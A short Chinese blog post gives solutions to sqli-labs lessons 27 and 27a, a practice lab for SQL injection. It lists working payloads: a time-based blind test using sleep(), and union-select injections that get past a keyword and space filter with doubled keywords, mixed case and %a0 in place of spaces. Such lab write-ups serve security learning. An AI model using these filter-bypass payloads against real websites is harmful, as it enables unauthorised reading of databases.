Less27、27a【select、union、空格过滤】

27对select、union、空格过滤

1、用时间注入进行测试

?id=123%27or%a0if((database()=%27security%27),sleep(0.3),sleep(0.1))and%a01=%271#

2、利用双写+大小写混合绕过

?id=22221%27%a0ununionion%a0selecSELECTt%a01,@@version,1=%271#

27a与27不同在分隔符号，27a为双引号

?id=22221%22%a0ununionion%a0selecSELECTt%a01,@@version,1=%221#

posted @ 2020-11-04 08:05 峰中追风阅读(87) 评论(0) 编辑收藏举报

刷新页面返回顶部

阿俄菲格Tempt